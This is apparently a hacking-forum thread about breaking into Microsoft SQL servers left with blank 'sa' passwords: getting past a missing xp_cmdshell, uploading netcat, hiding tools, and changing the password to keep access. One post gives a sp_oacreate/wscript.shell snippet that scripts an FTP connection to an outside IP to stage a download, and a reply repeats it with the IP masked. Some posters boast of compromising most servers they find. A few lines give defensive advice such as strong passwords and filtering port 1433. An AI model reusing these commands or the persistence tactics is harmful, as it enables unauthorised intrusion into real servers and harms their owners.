if you got an mssql box with sa / [null]
you can change pw to secure it ...

those are mssql servers that are installed with IIS in it's default configuration (most sysops don't even notice that they have mssql installed with iis) ....
here pw changing is a good method for a h4x0r ..

but if you have a server with a pw set like
sa / network (or something else) then the sysop will probably be using his sql server ... and when you change pw he'll discover he's been h4x0rd very soon ...

so i would say it depends on the situation..

tried it several times didnt work.. i created the input file for osql and i executed it but it never worked on any servers i dunno what i might be doing wrong :\

nice dude thx

tyler: i tried to bypass the sql error but it did never work...i prolly made something wrong but dont ask me what ..

first of all, thanks jockel for the info.
I have found this info on some japanese sites befor but never got it working (maybe because I couldn understand the text around the script?) ^^
Well I will give this a try.
Some things I wonder about is ... does this way still work when xpsql70.dll and/or xplog70.dll is missing? many people delete those files not even knowing what they are for, well xplog70.dll has a hudge list of procedures inside, was just wondering if it is in any way needed to run this script file?
thx for info

so long
Killaloop

I try'd to do it with this method also, didn't work out for me. I've try'd it on serveral servers. But it doesn't realy matter i guess, i always change the sql password and install it as a systemservice + i hide my stro files

that's secure enough

yeah it also works if the dll is deleted ...

to all those people who didn't get it working :
try it out your own or feel free to contact me per private message or email ..
i'll help wherever i can =)

will try your method

great job!

thx for your reply. just found out that it doesnt matter if the dll is missing or not. functions are stored elsewhere ^^
well I still see some things in your script which dont work out for me. will give it some more tries.
another info for the results: its not difficult to catch the return messages, but for now. if you execute this script and you get code 0 everything worked successful. everything beside a null is normally an error message or a return code.
well I would as his example shows upload an netcat and execute it.
and first check if your "test-target" is firewalled befor coming here, telling it didnt work out for you.
Thx again for your work m8 I will give it somemore tries. I know the functions are working just figure out how to use people.

so long
Killaloop

Hey Jockel, i dont think that your hack tip is not for the public mass. i would prefer it, that keept it secret. to much kiddies in here!

still some work for me ^^
damn where is my sql programer

i just get this error message while connecting with isql to a sql-server :

nice nice.
I finally got this working for every mssql server I have located so far.
its not hard to bypass the missing xp_cmdshell. works on 9 out of 10 without problems. with someother processes I have written its even no problem to hack into a system if rights for cmd.exe are missing or if ftp.exe or tftp.exe are missing.
its nearly inpossible to stop me from compromising a host once I got the sql login.
I have written some really nice code for doing so.

However, I wont make it public, so dont ask.
If your running an mssql server make sure every pass is STRONG (dont mess around with setting up the rights for the accounts, it wont help much)
If you have hacked a mssql server and want to protect it, as I have always said to everyone asking me, do not delete the dlls replace the weak pass with a good one (since most sql admins dont even know the existence of the weak sa login)

so long
Killaloop

if all stored procs are deleted and execute and create permissions are denied for SA on a SA/[NULL] box lets say, then i think there is definitelly NO way of getting in ...

if you know any better please let us know killaloop

so just drop all unused stored procs
and deny the rights ..
thats it .. secured

hehe
you think droping all stored procedures in the masterdb is a nice way of secuing?
if its a good box and sql is setuped for actual use the box wont last 2 days if you dropp all procedures. and for mssql wont even operate so why would a sysadmin have it running? (hmmm nice honeypot ey?)
anotherthing is you cannot denie all access for your mssql server.
you normally setup a own user account for msssql which has limited rights (no rights for cmd.exe etc..). you cannot simply denie all execution because mssql server needs some rights to operate.
and even dropping all stored procedures isnt 100% secure since they can be rewritten (in the order they depend on each other).
the only real way to secure mssql is dont let anyone in (for an hacker: change sa login, for sysadmin filter port 1433)

you didn't listen !!!

with "deny execution and create privilieges" i'm not talking about windows right system ok ???? ..
i'm talking about SQL !!
Structured Query Language !!

and again !
IM NOT AN F*CKING HACKER !!!
DID YOU UNDERSTAND !????
if i want to secure my OWN MSSQL server i can delete whatever stored procedures I WANT !?? ok ??
and the procedures CANNOT be rewritten if "create procedure" is denied ..

hehe ....
sometimes im really wondering if this is an security related board ..
or f*cking FXP scene ......

( sorry for falme ... but this really pisses me off )

I dont know what of my text offended you but you should slow alittle down m8
What you said:
"if all stored procs are deleted and execute and create permissions are denied for SA on a SA/[NULL] box lets say, then i think there is definitelly NO way of getting in ..."

a)if they are deleted your sql server isn operating, so why setting up a sqlserver?
b)sa login is systemadministrator you cannot denie permission to write a procedure to this account. or what about bruteforcing the admin login? only way to really secure is setting up a strong password (what pisses you off about me saying that, or is your english that bad that you dont understand the words I'm writing?)

for your other offenses. I haven't said you are a hacker. I was talking in general how to secure a mssql server for sysadmin and for a "hacker". was not related to you only, cause other people read this thread aswell!! so I really dont see what pissed you off (the Hehe at the top of my post? that was related to deleting all procedures .... mssql server isn operating then and so the server itself is useless, think about it please befor you jump onto my neck).


"you didn't listen !!!

with "deny execution and create privilieges" i'm not talking about windows right system ok ???? ..
i'm talking about SQL !!"

again, if an intruder bruteforced your admin login what happens? you have to setup a limited user account onyour system which mssql runs on.

reread this befor killing me for something I havent ment the way it might have sounded for you. or switch your drugs ^^

hehe ok
then finally let's close this topic ..
i didn't meen to attack u ..
sorry =)

i will explain u my porblem i have sql scan and then i connect to it with sqlexec when i am typing dir c:\ and than enter
i got sql_error after i read this article i came back to the scan and done this
declare @s int
exec sp_oacreate "wscripts.shell", @s out
exec sp_oamethod @s, "run",NULL, "cmd.exe /c echo open 65.113.119.148 >> c:\text3.txt
i still got sql_error is it ok?
or not wat should i do to not get it plz hlp guyz


and btw y i cant post new topic i have some stuff to share with uand i cant post topic

You sould never post real ips

"declare @s int
exec sp_oacreate "wscripts.shell", @s out
exec sp_oamethod @s, "run",NULL, "cmd.exe /c echo open x.x.x.x >> c:\text3.txt"

well this wont work since this is the command for a procedure you havent written into database, I wont explain you how you write the procedure since this is not dedicated to script kidds and others.

first of all im not scripty kiddie
i need to know wat i am doing and to be like donkey to type the commands and that all
my problem is that i dont konw sql
i konw others language like c,c++,java
so plz can u help me to understand how to bypass it

the tut is complete and everything you need beside a brain and a putter is described
sorry this annoyes me